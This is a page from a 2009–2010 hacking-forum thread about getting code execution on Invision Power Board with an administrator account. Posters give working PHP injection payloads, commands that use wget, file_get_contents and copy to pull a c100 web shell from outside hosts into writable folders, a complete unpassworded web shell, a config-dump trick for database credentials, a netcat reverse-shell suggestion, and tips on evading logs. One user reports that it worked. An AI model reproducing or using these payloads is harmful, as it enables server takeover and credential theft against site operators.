Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 80
Members: 0
Total: 80
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> Uploading a shell with Administrator acc? Goto page Previous1, 2, 3
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Wed Oct 28, 2009 1:22 am Reply with quote
RG007145
Active user
Active user
Joined: May 04, 2008
Posts: 27




What PHP code are you executing?

I know this is a bit of spoonfeeding, but I don't think there's any other way to show you:

So the first thing you do is figure out if running system commands is even possible - execute the following code:

Code:
${${print $query='ls -al'}}
${${system($query,$out)}}
${${print $out}}


The roundabout way is so that it works in older versions of PHP, which usually screws up if you put quotes in the system command. If the above command does not list files, try passthru() and execute() instead of system().

If it still doesn't work, system commands are unfortunately disabled. You may be able to write PHP to read a server file though.

Anyway, let's assume that system() commands are enabled. You will get a list of files in the standard unix format along with permissions.

If there is any folder with "rwxrwxrwx", you can write to it. So put, say, a PHP shell somewhere on your own domain. You can either make it a .txt and use PHP include(), or you can upload it to the writeable folder you found if you use wget.

For example, let's say the folder cache is writeable, and your php file ends in a ".php" (if you want your file to not be parsed by your own server, put the <?php and ?> tags in echo so that the resulting file is in itself a php - I've put my most basic shell at the end of this for you). Let's also say your file is on the domain http://xyz.org/meep.php

You would run the following command:

Code:
${${print $query='cd cache; wget http://xyz.org/meep.php'}}
${${system($query,$out)}}
${${print $out}}


This will upload the shell to the cache folder. You can access it at http://target/forum/cache/meep.php.

From there you can use the "ls" and "cd" commands to traverse directories and the "cat" command to read files. You can even tar a phpmyadmin and wget and then untar it. You can also upload, say, a .cpp file, compile it with g++ and run it. This could be a privilige escalation attempt. I'm guessing those are all advanced topics you'll get around to in due time.

The Promised Shell (unpassworded! You may put a GET variable check so that it checks like meep.php?password=1 where password is your own password, but that may not be for beginners)
------------------------------------------------------------------------------------
Code:
<textarea rows="10" cols="100">
<?php echo "<?php " ?>
if(isset($_POST['command'])){
system($_POST['command']);
}
<?php echo " ?>" ?>
</textarea>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="POST">
<input type="text" name="command" value="" size="40" maxlength="255">
</form>
<?php echo "<?php " ?>
print $_POST['command'];
<?php echo "?>" ?>
View user's profile Send private message
PostPosted: Wed Oct 28, 2009 8:36 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




RG007145 nice write BUT, ......

system(),passthru(),exec() ....etc are system FUNCTIONS not commands and in new version of IPB all this functions is disabled.

Quote:
If there is any folder with "rwxrwxrwx"


You mean dwxrwxrwx i suppose.

Quote:
${${print $query='cd cache; wget http://xyz.org/meep.php'}}
${${system($query,$out)}}
${${print $out}}


wget is great but you don't know wget are installed on the server or not.First of all you need to check which downloaders ar installed on server.Very easy

which wget curl fetch lynx links get

When.What if Allow_url_fopen is OFF?You need to check and this. phpinfo();


Quote:
You may put a GET variable check so that it checks like meep.php?password=1 where password is your own password, but that may not be for beginners)


If you do this every lamer with brains will find your password for 5 min.Why?Very simple.access_log,stats ....etc and worse he find your shell.
View user's profile Send private message
PostPosted: Wed Oct 28, 2009 3:13 pm Reply with quote
nuker
Active user
Active user
Joined: Aug 16, 2009
Posts: 39




thank you for your time. Im trying the code posted by walupeao

${${system(wget http://blacknite.eu/php_shells/c100.txt)}}

i dont know if it works because i havent tried it. Have you?
View user's profile Send private message
PostPosted: Wed Oct 28, 2009 4:00 pm Reply with quote
RG007145
Active user
Active user
Joined: May 04, 2008
Posts: 27




Quote:

If you do this every lamer with brains will find your password for 5 min.Why?Very simple.access_log,stats ....etc and worse he find your shell.


They will find your shell anyway. The best thing to do is put a netcat call in an existing php file, listen on a port and reverse connect by visiting the file.

PHP shells are never going to just stay there forever. Unless you're attacking someone really dumb.

And yes, I meant "drwxrwxrwx". There is no such thing as "dwxrwxrwx"? Maybe there is, I dunno.
View user's profile Send private message
PostPosted: Wed Oct 28, 2009 5:26 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




nuker wrote:
thank you for your time. Im trying the code posted by walupeao

${${system(wget http://blacknite.eu/php_shells/c100.txt)}}

i dont know if it works because i havent tried it. Have you?


Install IPB on your PC.
Logon as root admin.
Go to Tool&Settings.
From left menu "View all settings" or something like this.
choose some setting from list.
"Add new setting"
Scroll down and you see box "Raw bla bla php code"
type system('ls -la');
..and push save .... and you see Warning: system(),passthru().... etc is disabled.

In whis box you be able to execute php code.
Try phpinfo(); and push save and you see phpinfo.
Don't forget to delete every new setting.



Quote:
They will find your shell anyway


I don't agree with you.For netcat too.
View user's profile Send private message
PostPosted: Sun Jan 03, 2010 7:42 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




What to do if the wget function doesn't work? Here's the answer: go to the section for editing language and open lang_calendar for example.

Pick up a row and add the following code

Code:

{${$f=fopen(ROOT_PATH.'uploads/shell_c100.php', 'w')}}
{${$s=file_get_contents('http://blacknite.eu/php_shells/c100.txt')}}
{${fwrite($f, $s)}}
{${fclose(ROOT_PATH.'uploads/shell_c100.php')}}


save the file and go to http://forum/index.php?act=calendar
That will execute the code. Now your shell is located in uploads dir under the name of shell_c100.php

Enjoy Wink

PS: ROOT_PATH is a constant defined in the source code of IPB Wink

IF you can't upload a shell for some reason you can still get the information about SQL user/pass/db and many other located in conf_global.php or defined in ipsclass.php for the current session and etc. Just go to language edit->lang_calendar and place the following code in random row

Code:

{${print_r($this->vars)}}


After that go to http://forum/index.php?act=calendar and see the result Wink


Last edited by AIR_Nayden on Thu Jan 14, 2010 8:28 am; edited 1 time in total
View user's profile Send private message
PostPosted: Tue Jan 05, 2010 7:15 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




I run in a nastu problem.... I have no permission to get the file contents in any way... tried with file_get_contents, fopen, fread.... wget... (the shell is on remote host with .txt extension)

The other problem: no permissions to write in the specified directory... The chmod command is also not permitted... The eval() function with base64_decode with the encrypted source of the shell didn't work too...
If u have some ideas what to do - share them Smile
View user's profile Send private message
PostPosted: Tue Jan 05, 2010 8:20 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




$_SERVER()
$_REQUEST()

Good luck.Smile
View user's profile Send private message
PostPosted: Tue Jan 05, 2010 8:34 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




can u give a simple example, because I've never worked with these two.... Embarassed Embarassed
View user's profile Send private message
PostPosted: Wed Jan 06, 2010 6:19 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




http://www.php.net/manual/en/reserved.variables.server.php
View user's profile Send private message
PostPosted: Wed Jan 06, 2010 12:17 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




I know that but don't now how to use it in this situation when no writing in directories is allowed....
View user's profile Send private message
PostPosted: Wed Jan 06, 2010 2:40 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




You have shell in admin cp.Search other vhosts on server and then upload shell.

@copy('http://blablq.com/shell.php','/usr/home/dir/public_html/');
View user's profile Send private message
thank you AIR_Nayden i got it now
PostPosted: Thu Jan 14, 2010 6:27 am Reply with quote
wer0ckz
Active user
Active user
Joined: Jan 11, 2010
Posts: 25
Location: Philippines




thank you AIR_Nayden i got it now / im now able to upload shells hahaha thank you so much
View user's profile Send private message AIM Address
Uploading a shell with Administrator acc?
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 3 of 3
Goto page Previous1, 2, 3
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.055 Seconds